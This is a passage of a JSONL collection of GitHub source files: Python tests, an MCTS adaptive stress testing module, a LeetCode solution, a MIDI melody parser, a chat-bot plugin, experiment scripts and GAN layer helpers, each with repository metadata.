1)\n\t\t\tschema.add_field(\n\t\t\t\tfields.SchemaType(\"level_1\", mocked_mod_name, required=True)\n\t\t\t)\n\t\t\tself.schema = schema\n\t\t\t# print(\"\\nDUMP\", self.schema.to_json(sort_keys=True, indent=4))\n\n\tdef test_001_validate_ok(self):\n\t\tcases = [\n\t\t\tdict(\n\t\t\t\tlevel_1=dict(\n\t\t\t\t\tmocked_object={},\n\t\t\t\t\tinner_mocked=dict(\n\t\t\t\t\t\tinner_object={},\n\t\t\t\t\t\tinner_enum=\"ONE\"\n\t\t\t\t\t),\n\t\t\t\t)\n\t\t\t),\n\t\t]\n\t\tfor data in cases:\n\t\t\tok = self.schema.validate(data)\n\t\t\t# print(self.schema.get_errors())\n\t\t\tassert_true(ok)\n\n\tdef test_002_validate_str_nok(self):\n\t\tcases = [\n\t\t\tdict(\n\t\t\t\tlevel_1=123\n\t\t\t),\n\t\t\tdict(\n\t\t\t\tlevel_1={}\n\t\t\t),\n\t\t\tdict(\n\t\t\t\tlevel_1=dict(\n\t\t\t\t)\n\t\t\t),\n\t\t\tdict(\n\t\t\t\tlevel_1=dict(\n\t\t\t\t\tinner_mocked=None\n\t\t\t\t)\n\t\t\t),\n\t\t\tdict(\n\t\t\t\tlevel_1=dict(\n\t\t\t\t\tinner_mocked=dict()\n\t\t\t\t)\n\t\t\t),\n\t\t\tdict(\n\t\t\t\tlevel_1=dict(\n\t\t\t\t\tmocked_object={},\n\t\t\t\t\tinner_mocked=dict(\n\t\t\t\t\t\tinner_object=None,\n\t\t\t\t\t\tinner_enum=\"INVALID\"\n\t\t\t\t\t)\n\t\t\t\t),\n\t\t\t),\n\t\t]\n\t\tfor data in cases:\n\t\t\tok = self.schema.validate(data)\n\t\t\t# print(self.schema.get_errors(as_json=True))\n\t\t\tassert_false(ok)\n","repo_name":"mcptr/pjxxs","sub_path":"test/schema/fields/test_validation_schema_type.py","file_name":"test_validation_schema_type.py","file_ext":"py","file_size_in_byte":1941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37439544184","text":"import pickle\n\nimport numpy as np\n# import garage.misc.logger as logger\nfrom dowel import logger\nfrom dowel import tabular\n\nimport ast_toolbox.mcts.MDP as MDP\n\n\nclass ASTParams:\n \"\"\"Structure that stores internal parameters for AST.\n\n Parameters\n ----------\n max_steps : int, optional\n The maximum search depth.\n\n \"\"\"\n\n def __init__(self, max_steps, log_interval, log_tabular, log_dir=None, n_itr=100):\n self.max_steps = max_steps\n self.log_interval = log_interval\n self.log_tabular = log_tabular\n self.log_dir = log_dir\n self.n_itr = n_itr\n\n\nclass AdaptiveStressTest:\n \"\"\"The AST wrapper for MCTS using the actions in env.action_space.\n\n Parameters\n ----------\n p : :py:class:`ast_toolbox.mcts.AdaptiveStressTesting.ASTParams`\n The AST parameters\n env : :py:class:`ast_toolbox.envs.go_explore_ast_env.GoExploreASTEnv`.\n The environment.\n top_paths : :py:class:`ast_toolbox.mcts.BoundedPriorityQueues`, optional\n The bounded priority queue to store top-rewarded trajectories.\n \"\"\"\n\n def __init__(self, p, env, top_paths):\n self.params = p\n self.env = env\n self.sim_hash = hash(0)\n self.transition_model = self.transition_model()\n self.step_count = 0\n self._isterminal = False\n self._reward = 0.0\n self.action_seq = []\n self.trajectory_reward = 0.0\n self.top_paths = top_paths\n self.iter = 0\n self.isInitialize = True\n\n def reset_step_count(self):\n \"\"\"Reset the env step count.\n \"\"\"\n self.step_count = 0\n\n def initialize(self):\n \"\"\"Initialize training variables.\n\n Returns\n ----------\n env_reset :\n The reset result from the env.\n \"\"\"\n self._isterminal = False\n self._reward = 0.0\n if self.iter == 0 and self.isInitialize:\n reward_file = open(\"mcts_rewards.txt\", \"a\")\n reward_file.writelines(\"Iteration: #\" + str(self.iter) + \"\\n\")\n reward_file.close()\n paths_file = open(\"mcts_paths.txt\", \"a\")\n paths_file.writelines(\"Iteration: #\" + str(self.iter) + \"\\n\")\n paths_file.close()\n crash_file = open(\"mcts_crashes.txt\", \"a\")\n crash_file.writelines(\"Iteration: #\" + str(self.iter) + \"\\n\")\n crash_file.close()\n self.isInitialize = False\n self.action_seq = []\n self.trajectory_reward = 0.0\n return self.env.reset()\n\n def update(self, action):\n \"\"\"Update the environment as well as the assosiated parameters.\n\n Parameters\n ----------\n action : :py:class:`ast_toolbox.mcts.AdaptiveStressTesting.ASTAction`\n The AST action.\n\n Returns\n ----------\n obs : :py:class:`numpy.ndarry`\n The observation from the env step.\n reward : float\n The reward from the env step.\n done : bool\n The terminal indicator from the env step.\n info : dict\n The env info from the env step.\n \"\"\"\n self.step_count += 1\n obs, reward, done, info = self.env.step(action.get())\n self._isterminal = done\n self._reward = reward\n self.action_seq.append(action)\n self.trajectory_reward += reward\n if done:\n self.top_paths.enqueue(self.action_seq, self.trajectory_reward, make_copy=True)\n self.logging()\n return obs, reward, done, info\n\n def logging(self):\n \"\"\"Logging the training information.\n \"\"\"\n if self.params.log_tabular and self.iter <= self.params.n_itr:\n if self.step_count % self.params.log_interval == 0:\n self.iter += 1\n reward_file = open(\"mcts_rewards.txt\", \"a\")\n reward_file.writelines(\"Iteration: #\" + str(self.iter) + \"\\n\")\n reward_file.close()\n path_file = open(\"mcts_paths.txt\", \"a\")\n path_file.writelines(\"Iteration: #\" + str(self.iter) + \"\\n\")\n path_file.close()\n crash_file = open(\"mcts_crashes.txt\", \"a\")\n crash_file.writelines(\"Iteration: #\" + str(self.iter) + \"\\n\")\n crash_file.close()\n logger.log(' ')\n tabular.record('StepNum', self.step_count)\n record_num = 0\n if self.params.log_dir is not None:\n if self.step_count == self.params.log_interval: # first time logging\n best_actions = []\n else:\n with open(self.params.log_dir + '/best_actions.p', 'rb') as f:\n best_actions = pickle.load(f)\n\n best_actions.append(np.array([x.get() for x in self.top_paths.pq[0][0]]))\n with open(self.params.log_dir + '/best_actions.p', 'wb') as f:\n pickle.dump(best_actions, f)\n\n for (topi, path) in enumerate(self.top_paths):\n tabular.record('reward ' + str(topi), path[1])\n record_num += 1\n\n for topi_left in range(record_num, self.top_paths.N):\n tabular.record('reward ' + str(topi_left), 0)\n logger.log(tabular)\n logger.dump_all(self.step_count)\n tabular.clear()\n\n def isterminal(self):\n \"\"\"Check whether the current path is finished.\n\n Returns\n ----------\n isterinal : bool\n Whether the current path is finished.\n \"\"\"\n return self._isterminal\n\n def get_reward(self):\n \"\"\"Get the current AST reward.\n\n Returns\n ----------\n reward : bool\n The AST reward.\n \"\"\"\n return self._reward\n\n def random_action(self):\n \"\"\"Randomly sample an action for the rollout.\n\n Returns\n ----------\n action : :py:class:`ast_toolbox.mcts.AdaptiveStressTesting.ASTAction`\n The sampled action.\n \"\"\"\n return ASTAction(self.env.action_space.sample())\n\n def explore_action(self, s, tree):\n \"\"\"Randomly sample an action for the exploration.\n\n Parameters\n ----------\n s : :py:class:`ast_toolbox.mcts.AdaptiveStressTesting.ASTState`\n The current state.\n tree : dict\n The searching tree.\n\n Returns\n ----------\n action : :py:class:`ast_toolbox.mcts.AdaptiveStressTesting.ASTAction`\n The sampled action.\n \"\"\"\n return ASTAction(self.env.action_space.sample())\n\n def transition_model(self):\n \"\"\"Generate the transition model used in MCTS.\n\n Returns\n ----------\n transition_model : :py:class:`ast_toolbox.mcts.MDP.TransitionModel`\n The transition model.\n \"\"\"\n def get_initial_state():\n \n self.t_index = 1\n self.initialize()\n s = ASTState(self.t_index, None, None)\n self.sim_hash = s.hash\n return s\n\n def get_next_state(s0, a0):\n assert self.sim_hash == s0.hash\n self.t_index += 1\n self.update(a0)\n s1 = ASTState(self.t_index, s0, a0)\n self.sim_hash = s1.hash\n r = self.get_reward()\n return s1, r\n\n def isterminal(s):\n assert self.sim_hash == s.hash\n return self.isterminal()\n\n def go_to_state(target_state):\n s = get_initial_state()\n actions = get_action_sequence(target_state)\n # print(\"go to state with actions: \",actions)\n R = 0.0\n for a in actions:\n s, r = get_next_state(s, a)\n R += r\n assert s == target_state\n return R, actions\n return MDP.TransitionModel(get_initial_state, get_next_state, isterminal, self.params.max_steps, go_to_state)\n\n\nclass ASTState:\n \"\"\"The AST state.\n\n Parameters\n ----------\n t_index : int\n The index of the timestep.\n parent : :py:class:`ast_toolbox.mcts.AdaptiveStressTesting.ASTState`\n The parent state.\n action : :py:class:`ast_toolbox.mcts.AdaptiveStressTesting.ASTAction`\n The action leading to this state.\n \"\"\"\n\n def __init__(self, t_index, parent, action):\n self.t_index = t_index\n self.parent = parent\n self.action = action\n self.hash = hash(self)\n\n def __hash__(self):\n \"\"\"The redefined hashing method.\n\n Returns\n ----------\n hash : int\n The hashing result.\n \"\"\"\n if self.parent is None:\n return hash((self.t_index, None, hash(self.action)))\n else:\n return hash((self.t_index, self.parent.hash, hash(self.action)))\n\n def __eq__(self, other):\n \"\"\"The redefined equal method.\n\n Returns\n ----------\n is_equal : bool\n Whether the two states are equal.\n \"\"\"\n return hash(self) == hash(other)\n\n\nclass ASTAction:\n def __init__(self, action):\n \"\"\"The AST action.\n\n Parameters\n ----------\n action :\n The true actions used in the env.\n \"\"\"\n self.action = action\n\n def __hash__(self):\n \"\"\"The redefined hashing method.\n\n Returns\n ----------\n hash : int\n The hashing result.\n \"\"\"\n return hash(tuple(self.action))\n\n def __eq__(self, other):\n \"\"\"The redefined equal method.\n\n Returns\n ----------\n is_equal : bool\n Whether the two states are equal.\n \"\"\"\n return np.array_equal(self.action, other.action)\n\n def get(self):\n \"\"\"Get the true action.\n\n Returns\n ----------\n action :\n The true actions used in the env.\n \"\"\"\n return self.action\n\n\ndef get_action_sequence(s):\n \"\"\"Get the action sequence that leads to the state.\n\n Parameters\n ----------\n s : :py:class:`ast_toolbox.mcts.AdaptiveStressTesting.ASTState`\n The target state.\n\n Returns\n ----------\n actions : list[:py:class:`ast_toolbox.mcts.AdaptiveStressTesting.ASTAction`]\n The action sequences leading to the target state.\n \"\"\"\n actions = []\n while s.parent is not None:\n actions.append(s.action)\n s = s.parent\n actions = list(reversed(actions))\n return actions\n","repo_name":"mushi333/2021-FIT4003-SBSE-for-self-driving-cars","sub_path":"ast_toolbox/mcts/AdaptiveStressTesting.py","file_name":"AdaptiveStressTesting.py","file_ext":"py","file_size_in_byte":10476,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"18"} +{"seq_id":"71335765800","text":"# 2421. Number of Good Paths\n# Union Find\n\n# https://leetcode.com/problems/number-of-good-paths/solutions/2620529/python-explanation-with-picture-dsu/?orderBy=most_votes\nclass UnionFind:\n def __init__(self, n):\n self.root = list(range(n))\n self.rank = [1 for i in range(n)]\n \n def find(self, p):\n while p != self.root[p]:\n self.root[p] = self.root[self.root[p]]\n p = self.root[p]\n return p \n\n\nclass Solution:\n def numberOfGoodPaths(self, vals: List[int], edges: List[List[int]]) -> int:\n res = n = len(vals)\n uf = UnionFind(n)\n\n graph = collections.defaultdict(list)\n for a,b in edges:\n graph[a].append(b)\n graph[b].append(a)\n \n count = collections.defaultdict(dict)\n for i, v in enumerate(vals):\n count[i][v] = 1\n \n for v, cur in sorted([v, i] for i,v in enumerate(vals)):\n for nxt in graph[cur]:\n root_nxt,root_cur = uf.find(nxt), uf.find(cur)\n if vals[nxt] <= v and root_cur != root_nxt:\n uf.root[root_cur] = root_nxt\n res += count[root_cur][v] * count[root_nxt].get(v, 0)\n count[root_nxt][v] = count[root_nxt].get(v, 0) + count[root_cur][v]\n\n \n return res\n\n\n","repo_name":"junyang10734/leetcode-python","sub_path":"2421.py","file_name":"2421.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"1942231554","text":"with open('lyrics.txt', encoding=\"utf8\") as f:\r\n lyrics = f.read()\r\n\r\nlyrics_list = []\r\nbanned = [' ', '.' , ',' , '!']\r\nlyrics_word = ''\r\n\r\nfor w in lyrics:\r\n w = w.lower()\r\n if w == '\\n':\r\n if lyrics_word:\r\n lyrics_list.append(lyrics_word)\r\n lyrics_word = ''\r\n elif w not in banned:\r\n lyrics_word += w\r\n else:\r\n if lyrics_word:\r\n lyrics_list.append(lyrics_word)\r\n lyrics_word = ''\r\nif lyrics_word:\r\n lyrics_list.append(lyrics_word)\r\n lyrics_word = ''\r\n\r\ncheck_dupes = {}\r\n\r\nfor w in lyrics_list:\r\n w = w.lower()\r\n if w not in check_dupes:\r\n check_dupes[w] = 1\r\n else:\r\n check_dupes[w] += 1\r\n\r\nmost_freq_word = max(check_dupes.values())\r\n\r\nfor k in check_dupes.keys():\r\n if check_dupes[k] == most_freq_word:\r\n most_freq_word = k , check_dupes[k]\r\n\r\ndef most_common_words(most_freq_word):\r\n values = most_freq_word.values()\r\n best = max(values)\r\n words = []\r\n for k in most_freq_word:\r\n if most_freq_word[k] == best:\r\n words.append(k)\r\n return words , best \r\n\r\n\r\ndef words_often(check_dupes , times):\r\n words = []\r\n word1 = []\r\n for i in check_dupes:\r\n if check_dupes[i] >= times:\r\n word1 = i , check_dupes[i]\r\n words.append(word1)\r\n return words \r\n\r\nresalt = words_often(check_dupes , 7 ) \r\nprint(resalt)","repo_name":"Akimov232/big_work","sub_path":"programm_word.py","file_name":"programm_word.py","file_ext":"py","file_size_in_byte":1394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7292165426","text":"'''This module defines the integer-matrix subroutines used in\n quarc.\n'''\nfrom core import *\nfrom sklearn.linear_model import LogisticRegression, LinearRegression\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.metrics import classification_report\nfrom sklearn.neural_network import MLPRegressor\nfrom sklearn.preprocessing import PolynomialFeatures\nimport numpy as np\n\n\nclass LinearAutoregressiveIM():\n\n\tdef __init__(self):\n\t\tpass\n\n\tdef avg_run_size(self, vector):\n\n\t\tN = vector.shape[0]\n\n\t\truns = []\n\t\tstart = 0\n\t\tfor i in range(N-1):\n\t\t\tif vector[i] != vector[i+1]:\n\t\t\t\truns.append(i+1 - start)\n\t\t\t\tstart = i + 1\n\n\t\treturn np.mean(runs)\n\n\n\tdef compress(self, src):\n\t\tdata = src.copy()\n\t\tN,p = data.shape\n\t\tcoderange = np.max(src)\n\n\t\tmodels = []\n\t\tclasses = []\n\n\t\tlag = 1\n\t\t\n\t\tfor j in range(0, p):\n\n\t\t\ttraining_X = []\n\t\t\ttraining_Y = []\n\n\t\t\tfor i in range(lag, N):\n\t\t\t\ttraining_X.append(src[i-lag:i,:].flatten())\n\t\t\t\ttraining_Y.append(src[i,j])\n\n\t\t\tX = np.array(training_X)\n\t\t\tY = np.array(training_Y)\n\n\t\t\tp = PolynomialFeatures(degree = 2)\n\t\t\tX = p.fit_transform(X)\n\n\t\t\treg = LinearRegression()\n\t\t\treg.fit(X,Y)\n\n\t\t\tY_pred = np.round(reg.predict(X))\n\n\t\t\tcnt = 0\n\t\t\tfor i in range(lag, N-1):\n\t\t\t\tif int(Y_pred[i-lag]) == int(Y[i-lag]):\n\t\t\t\t\tdata[i,j] = coderange + 1\n\t\t\t\t\tcnt += 1\n\n\t\t\t\t\t#print(int(Y_pred[i-lag]),int(Y[i-lag]))\n\n\t\t\tprint('Replaced', cnt, N, 'for attr',j, self.avg_run_size(src[:,j]),self.avg_run_size(data[:,j]))\n\t\t\t#models.append(reg.coef_)\n\t\t\tbreak\n\n\n\n\t\treturn data, models, classes\n\n\n\tdef decompress(self, src, models, classes):\n\n\t\tcoderange = np.max(src)\n\t\tN,p = src.shape\n\n\t\t#left to right decoding\n\t\tfor (j,(m,c)) in enumerate(zip(models, classes)):\n\t\t\tif not m is None:\n\t\t\t\tslice = list(range(0,j))\n\t\t\t\tX = src[:,slice]\n\n\t\t\t\treg = LogisticRegression()\n\t\t\t\treg.intercept_ = m[:,0]\n\t\t\t\treg.coef_ = m[:,1:]\n\t\t\t\t#print(c, m.shape, c.shape)\n\t\t\t\treg.classes_ = c\n\n\t\t\t\tYpred = reg.predict(X)\n\n\t\t\t\t#Ypred = np.array([classes[Ypred[i]] for i in range(N)])#assign actual class values\n\n\t\t\t\tmask = (src[:,j] == coderange)\n\t\t\t\tsrc[mask,j] = Ypred[mask]#impute\n\n\t\treturn src, np.max(src)\n\n\n\n\nclass LinearAutoregressiveIM2():\n\n\tdef __init__(self):\n\t\tpass\n\n\n\tdef compress(self, src):\n\t\tdata = src.copy()\n\t\tN,p = data.shape\n\t\tcoderange = int(np.max(src))\n\t\tmodels = []\n\t\tclasses = []\n\t\t\n\t\tdata = data.flatten()\n\n\t\tnew_data = np.zeros((N*p, coderange))\n\n\t\t#for each possible code\n\t\tfor i in range(coderange):\n\t\t\tnew_data[data == i, i] = 1\n\t\t\t\n\t\t#\tnew_data[:,i] = data[]\n\n\t\treturn new_data, models, classes\n\n\n\tdef decompress(self, src, models, classes):\n\n\t\tcoderange = np.max(src)\n\t\tN,p = src.shape\n\n\t\t#left to right decoding\n\t\tfor (j,(m,c)) in enumerate(zip(models, classes)):\n\t\t\tif not m is None:\n\t\t\t\tslice = list(range(0,j))\n\t\t\t\tX = src[:,slice]\n\n\t\t\t\treg = LogisticRegression()\n\t\t\t\treg.intercept_ = m[:,0]\n\t\t\t\treg.coef_ = m[:,1:]\n\t\t\t\t#print(c, m.shape, c.shape)\n\t\t\t\treg.classes_ = c\n\n\t\t\t\tYpred = reg.predict(X)\n\n\t\t\t\t#Ypred = np.array([classes[Ypred[i]] for i in range(N)])#assign actual class values\n\n\t\t\t\tmask = (src[:,j] == coderange)\n\t\t\t\tsrc[mask,j] = Ypred[mask]#impute\n\n\t\treturn src, np.max(src)","repo_name":"sjyk/learning-to-compress","sub_path":"l2c/imcompress.py","file_name":"imcompress.py","file_ext":"py","file_size_in_byte":3127,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"16093366601","text":"from __future__ import annotations\nfrom dataclasses import dataclass\nfrom functools import cached_property\nfrom pathlib import Path\nfrom collections import Counter\nimport math\nfrom typing import TYPE_CHECKING, Iterable\n\nfrom mido import MidiFile, Message\n\nif TYPE_CHECKING:\n from argparse import _ArgumentGroup, Namespace\n from ._music_box import MusicBox\n\n\n@dataclass\nclass Sound:\n note: int\n time: int\n track: int\n\n\n@dataclass(frozen=True)\nclass Transposition:\n shift: int\n ratio: float\n\n\n@dataclass\nclass Distance:\n time: int\n diff: float = math.inf\n\n\n@dataclass\nclass Melody:\n path: Path\n music_box: MusicBox\n transpose_lower: int = -100\n transpose_upper: int = 100\n max_pause: int = 2000\n start_pause: int = 200\n cut_pause: int = 50_000\n transpose: bool = True\n tracks: frozenset = frozenset(range(40))\n\n @classmethod\n def init_parser(cls, parser: _ArgumentGroup) -> None:\n parser.add_argument(\n '--input', type=Path, required=True,\n help='path to the input MIDI (*.mid) file',\n )\n parser.add_argument(\n '--transpose-lower', type=int, default=cls.transpose_lower,\n help='the lowest transposition to try',\n )\n parser.add_argument(\n '--transpose-upper', type=int, default=cls.transpose_upper,\n help='the highest transposition to try',\n )\n parser.add_argument(\n '--no-transpose', action='store_true',\n help='do only octave transposition (in steps of 12 notes)',\n )\n parser.add_argument(\n '--tracks', nargs='*', type=int, default=[],\n help='numbers of sound tracks to include',\n )\n parser.add_argument(\n '--max-pause', type=int, default=cls.max_pause,\n help='maximum pause (in ticks) between two consequentive sounds',\n )\n parser.add_argument(\n '--start-pause', type=int, default=cls.start_pause,\n help='pause (in ticks) at the beginning of the first stripe',\n )\n parser.add_argument(\n '--cut-pause', type=int, default=cls.cut_pause,\n help='cut the song if pause is longer than this value (in ticks)',\n )\n\n @classmethod\n def from_args(cls, args: Namespace, *, music_box: MusicBox) -> Melody:\n return cls(\n path=args.input,\n transpose_lower=args.transpose_lower,\n transpose_upper=args.transpose_upper,\n max_pause=args.max_pause,\n start_pause=args.start_pause,\n cut_pause=args.cut_pause,\n transpose=not args.no_transpose,\n tracks=frozenset(args.tracks) or cls.tracks,\n music_box=music_box,\n )\n\n @cached_property\n def sounds(self) -> list[Sound]:\n sounds: list[Sound] = []\n with MidiFile(str(self.path)) as midi_file:\n message: Message\n for i, track in enumerate(midi_file.tracks):\n if i not in self.tracks:\n continue\n time = 0\n prev_time = 0\n sounds_before = len(sounds)\n for message in track:\n time += message.time\n if message.is_meta:\n continue\n if message.type != \"note_on\":\n continue\n if message.velocity == 0:\n continue\n # if the pause too long, make it shorter\n diff = time - prev_time\n if sounds and diff > self.cut_pause:\n break\n time = prev_time + min(self.max_pause, diff)\n prev_time = time\n sound = Sound(note=message.note, time=time, track=i)\n sounds.append(sound)\n name = f'#{i} \"{track.name.strip()}\"'\n print(f' included {len(sounds) - sounds_before} sounds from track {name}')\n\n # set fixed silence at the beginning\n if sounds:\n shift = self.start_pause - min(sound.time for sound in sounds)\n for sound in sounds:\n sound.time += shift\n\n sounds.sort(key=lambda sound: sound.time)\n return sounds\n\n @cached_property\n def notes_use(self) -> dict[int, int]:\n \"\"\"How many times each note appears in the melody.\n \"\"\"\n return dict(Counter(sounds.note for sounds in self.sounds))\n\n @cached_property\n def sounds_count(self) -> int:\n \"\"\"How many sounds in total there are in the melody.\n \"\"\"\n return len(self.sounds)\n\n def count_available_sounds(self, trans: int) -> int:\n \"\"\"How many notes from the melody fit in the music box.\n \"\"\"\n count = 0\n for note, freq in self.notes_use.items():\n if self.music_box.contains_note(note + trans):\n count += freq\n return count\n\n @cached_property\n def max_time(self) -> int:\n \"\"\"The tick when the last note plays.\n \"\"\"\n if not self.sounds:\n return 0\n return max(sounds.time for sounds in self.sounds)\n\n @cached_property\n def best_transpose(self) -> Transposition:\n \"\"\"Transposition that fits most of the notes.\n \"\"\"\n lower_octave = int(self.transpose_lower / 12) * 12\n best_transpose = self._get_best_transpose(\n range(lower_octave, self.transpose_upper, 12),\n )\n # Better to transpose with preserving most of the notes.\n # If full octave transposition doesn't fit just a bit, roll with it.\n if best_transpose.ratio >= .90:\n return best_transpose\n if not self.transpose:\n return best_transpose\n return self._get_best_transpose(\n range(self.transpose_lower, self.transpose_upper),\n )\n\n def _get_best_transpose(self, seq: Iterable[int]) -> Transposition:\n \"\"\"Try all transpositions from the sequence and pick the best one.\n \"\"\"\n if not self.sounds:\n return Transposition(0, 1)\n best_transpose: Transposition = Transposition(0, 0)\n for shift in seq:\n avail = self.count_available_sounds(shift)\n ratio = avail / float(self.sounds_count)\n if ratio == 1:\n return Transposition(shift, 1)\n if ratio > best_transpose.ratio:\n best_transpose = Transposition(shift, ratio)\n return best_transpose\n\n @cached_property\n def min_distance(self) -> float:\n \"\"\"The shortest time between 2 consequentive sounds (in ticks).\n \"\"\"\n min_distances: dict[int, Distance] = {}\n for sound in self.sounds:\n distance = min_distances.setdefault(sound.note, Distance(sound.time))\n diff = sound.time - distance.time\n if math.isclose(diff, 0):\n continue\n distance.diff = min(distance.diff, diff)\n distance.time = sound.time\n if not min_distances:\n return math.inf\n return min(d.diff for d in min_distances.values())\n","repo_name":"orsinium-labs/punchline","sub_path":"punchline/_melody.py","file_name":"_melody.py","file_ext":"py","file_size_in_byte":7169,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"18"} +{"seq_id":"33796891272","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING\n\nfrom domify import html_elements as e\n\nfrom cerbottana import custom_elements as ce\nfrom cerbottana.html_utils import BaseHTMLCommand\nfrom cerbottana.plugins import command_wrapper\n\nif TYPE_CHECKING:\n from cerbottana.models.message import Message\n\n\nclass ColorCompareHTML(BaseHTMLCommand):\n _STYLES = { # noqa: RUF012\n \"table\": {\n \"table-layout\": \"fixed\",\n \"width\": \"100%\",\n },\n \"background1\": {\n \"box-shadow\": \"inset 0 0 0 100vh, 0 30px\",\n \"height\": \"30px\",\n },\n \"username\": {\n \"font-weight\": \"bold\",\n \"text-align\": \"center\",\n },\n \"background2\": {\n \"box-shadow\": \"inset 0 0 0 100vh, 0 -30px\",\n \"height\": \"30px\",\n },\n }\n\n def __init__(self, *, usernames: list[str]) -> None:\n super().__init__()\n\n with self.doc, e.Table(style=self._get_css(\"table\")), e.Tr():\n for username in usernames:\n with e.Td():\n with ce.Username(name=username):\n e.Div(style=self._get_css(\"background1\"))\n\n e.Div(username, style=self._get_css(\"username\"))\n\n with ce.Username(name=username):\n e.Div(style=self._get_css(\"background2\"))\n\n\n@command_wrapper(\n aliases=(\"cc\",),\n helpstr=\"nick1, nick2, ... Visualizza i colori dei nickname elencati.\",\n required_rank_editable=True,\n)\nasync def colorcompare(msg: Message) -> None:\n # Ignore empty args: they're usually typos, i.e. \"a,,b\".\n args = [arg for arg in msg.args if arg]\n if not args:\n return\n\n html = ColorCompareHTML(usernames=args)\n await msg.reply_htmlbox(html.doc)\n","repo_name":"Parnassius/cerbottana","sub_path":"cerbottana/plugins/colorcompare.py","file_name":"colorcompare.py","file_ext":"py","file_size_in_byte":1802,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"20694754004","text":"import os,subprocess\n\nlog_dir='/home/kharesp/log'\npayload_sizes=[4000]\n#sleep_intervals=[5,10,20,40,80]\n#data_rates=[200,100,50,25,12]\nsleep_intervals=[80]\ndata_rates=[12]\npub_sample_count=10000\nsubscriber_step_size=4\nnumber_of_steps=8\n\ndef create_directory(path):\n if not os.path.exists(path):\n os.makedirs(path)\n\nfor i in range(len(data_rates)):\n #create directory for rate\n rate_dir_path='%s/rate_%d'%(log_dir,data_rates[i])\n create_directory(rate_dir_path)\n\n for idx,payload in enumerate(payload_sizes):\n create_directory('%s/%d'%(rate_dir_path,payload))\n \n print('python src/tests/subscriber_stress_test.py --setup %d %d %d\\\n 1 %s %s %s'%(subscriber_step_size,subscriber_step_size,\\\n number_of_steps*subscriber_step_size,\\\n str(sleep_intervals[i]),str(payload),str(pub_sample_count)))\n\n subprocess.check_call(['python','src/tests/subscriber_stress_test.py','--setup',\n '%d'%(subscriber_step_size),\n '%d'%(subscriber_step_size),\n '%d'%(number_of_steps*subscriber_step_size),\n '1',\n str(sleep_intervals[i]),\n str(payload),\n str(pub_sample_count)])\n\n sub_dirs=range(subscriber_step_size,\n subscriber_step_size*(number_of_steps+1),\n subscriber_step_size)\n\n command_string=['python','src/plots/summarize/summarize.py',\n '-log_dir',log_dir,'-sub_dirs']\n for sub_dir in sub_dirs:\n command_string.append(str(sub_dir))\n subprocess.check_call(command_string)\n\n command_string=['python','src/plots/summarize/collate.py',\n '-xlabel','subscribers','-log_dir',log_dir,'-sub_dirs']\n for sub_dir in sub_dirs:\n command_string.append(str(sub_dir))\n subprocess.check_call(command_string)\n\n command_string='mv /home/kharesp/log/*.csv %s/%d'%(rate_dir_path,payload)\n subprocess.check_call(['bash','-c',command_string])\n\n command_string='mv /home/kharesp/log/*.pdf %s/%d'%(rate_dir_path,payload)\n subprocess.check_call(['bash','-c',command_string])\n\n for sub_dir in sub_dirs:\n command_string='mv /home/kharesp/log/%d %s/%d'%(sub_dir,rate_dir_path,payload)\n subprocess.check_call(['bash','-c',command_string])\n","repo_name":"doc-vu/edgent","sub_path":"scripts/experiment/src/tests/baseline/subscriber_scalability_test.py","file_name":"subscriber_scalability_test.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"14338146980","text":"import os\nimport numpy as np\nfrom scipy.interpolate import interp1d\nimport matplotlib.pyplot as plt\nimport utils\n\ncurrent_file = os.path.abspath(__file__)\nfolder_pa = os.path.dirname(current_file)\nfolder_path = f\"{folder_pa}/\"\n# output_path = None\noutput_path = folder_path\n\nxold = np.linspace(0, 10, num=11, endpoint=True)\n# y = np.cos(-x**2/9.0)\nXO, y_true = utils.gen_obsdata()\ninstants = np.unique(XO[:, 4:5])\ntot = np.hstack((XO, y_true))\nXO_all = tot[tot[:, 0]==np.max(tot[:, 0])]\n\ny = XO_all[:, 5:].reshape(len(instants),)\n\nf = interp1d(instants, y)\nf2 = interp1d(instants, y, kind='cubic')\n\n\"DEVO INTERPOLARE ANCHE X, TEND, TSUP, FL PER L'OSSERVATORE!!!!\"\n\nxnew = np.linspace(0, 0.1, num=41, endpoint=True)\n\nplt.plot(instants, y, 'o', xnew, f(xnew), '-', xnew, f2(xnew), '--')\nplt.legend(['data', 'linear', 'cubic'], loc='best')\nplt.savefig(f\"{folder_path}figures/prova_interp_new.png\", dpi=300, bbox_inches='tight')\nplt.show()\n\n\n\n","repo_name":"gcappellini/pinns_bioheat","sub_path":"experiment/observer/interpol.py","file_name":"interpol.py","file_ext":"py","file_size_in_byte":939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"18233834573","text":"import numpy as np\nimport tensorflow as tf\n\nfrom config import cfg\n\nfrom operations_nodes import (\n eq_lr_init_w,\n const_init_w,\n pixel_norm,\n instance_norm,\n DTYPE,\n FORMAT,\n)\n\n\ndef dense(\n fan_in: int,\n fan_out: int,\n add_bias: bool = True,\n storage: list = None,\n block_name: str = \"\",\n):\n w, w_scale = eq_lr_init_w(\n shape=[fan_in, fan_out], name=f\"w_dense_{block_name}\", storage=storage\n )\n if add_bias:\n b = const_init_w(shape=[fan_out], name=f\"b_dense_{block_name}\", storage=storage)\n\n def process(x: tf.Tensor) -> tf.Tensor:\n return tf.add(tf.matmul(x, w*w_scale), b)\n\n return process\n\n def process(x: tf.Tensor) -> tf.Tensor:\n return tf.matmul(x, w*w_scale)\n\n return process\n\n\ndef conv2d(\n fan_in: int,\n f_maps: int,\n kernel_hw_dims: tuple,\n add_bias: bool = True,\n storage: list = None,\n block_name: str = \"\",\n):\n assert 